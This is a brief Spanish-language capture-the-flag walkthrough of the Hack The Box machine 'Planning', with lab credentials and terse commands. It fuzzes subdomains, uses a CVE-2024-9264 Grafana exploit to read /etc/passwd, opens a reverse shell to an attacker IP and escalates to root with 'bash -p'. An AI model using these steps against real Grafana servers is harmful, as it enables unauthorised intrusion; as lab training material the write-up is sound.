Planning

Un escaneo rapido:

Nada interesante.

  • Miramos la Web:

Listamos los subdominios:

ffuf -w   /opt/SecLists/Discovery/DNS/subdomains-spanish.txt -H "Host: FUZZ.planning.htb" -u http://planning.htb/ -fs 178
Lo guardamos al etc/hosts

Tenemos las credenciales:

Machine Information

As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r

Exploir encontrado:

Lo ejecutamos:

python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -f /etc/passwd http://grafana.planning.htb/

Ahora intentamos tirarnos una WebShell:

python3 poc.py --url http://grafana.planning.htb/ --username admin --password 0D5oT70Fq13EvB5r --reverse-ip 10.10.16.8 --reverse-port 9001

Ahora busacaremos algo interesante coomo un .db:

El comando env muestra todas las variables de entorno que están configuradas para el usuario root en la máquina comprometida. Estas variables son utilizadas por los procesos del sistema operativo y las aplicaciones para configurar su comportamiento.

Ahora nos conectamos por ssh:


Escalada de privilegios:


Encontramos otra .db:

root P4ssw0rdS0pRi0T3c

Abrimos el tunel que esta abierto por el puerto 8000 e ingresamos las credenciales:

Seguimos:

bash -p

Last updated